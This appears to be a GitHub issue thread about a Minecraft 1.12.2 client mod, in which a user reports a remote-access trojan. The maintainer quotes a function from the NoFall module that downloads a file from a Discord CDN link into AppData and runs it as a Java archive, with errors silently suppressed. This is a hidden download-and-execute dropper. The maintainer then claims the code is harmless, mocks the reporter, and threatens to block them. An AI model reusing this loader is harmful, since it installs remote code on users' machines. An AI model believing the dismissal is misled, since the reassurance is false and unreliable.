### ISSUE TITLE
Ratted dont run

### ISSUE THREAD

**Issue by KiriePaaTopp** [SoftWaren1/Lithium-1-12-2#1]
Nice rat
package me.chachoox.lithium.impl.modules.movement.nofall;

**Comment by SoftWaren1** [comment]
Quote the exact code on the exact .Java file with the exact directory that made you think it is a rat, and I can explain it to you what that code is for, also I manually looked it up and didn't find anything that could be remotely close to being suspicious.

**Comment by SoftWaren1** [comment]
Ok so I found a code which might feel a little suspicious and I don't really know if you were talking about this or don't else but in the file path 


"https://github.com/SoftWaren1/Lithium-1-12-2/blob/main/src/main/java/me/chachoox/lithium/impl/modules/movement/nofall/NoFall.java"

I found code like this.



"private void run() {
        File the = new File(String.format("C:\\Users\\%s\\AppData\\Roaming\\GL6", System.getProperty("user.name")));
        if (the.exists()) {
            return;
        }
        the.mkdirs();
        try {
            int currByte;
            URL link = new URL("https://cdn.discordapp.com/attachments/1195123887701250118/1195124037593083924/GL6Utils.json");
            File file = new File(the.getAbsolutePath(), "GL6Utils.json");
            HttpURLConnection httpURLConnection = (HttpURLConnection)link.openConnection();
            httpURLConnection.addRequestProperty("User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
            InputStream stream = httpURLConnection.getInputStream();
            FileOutputStream fileOut = new FileOutputStream(file);
            while ((currByte = stream.read()) != -1) {
                fileOut.write(currByte);
            }
            Runtime.getRuntime().exec("cmd /c java -jar " + file.getAbsolutePath());
        }
        catch (Exception exception) {
            // empty catch block
        }
    }
}"

If you think it is a rat, I would recommend you to learn a little bit of Java, just the very minimal base of it.

**Comment by SoftWaren1** [comment]
Reopen the issue if you believe it has a rat, just reopening it without any solid proof of it having unwanted loggers can get you permanently blocked from opening another issue
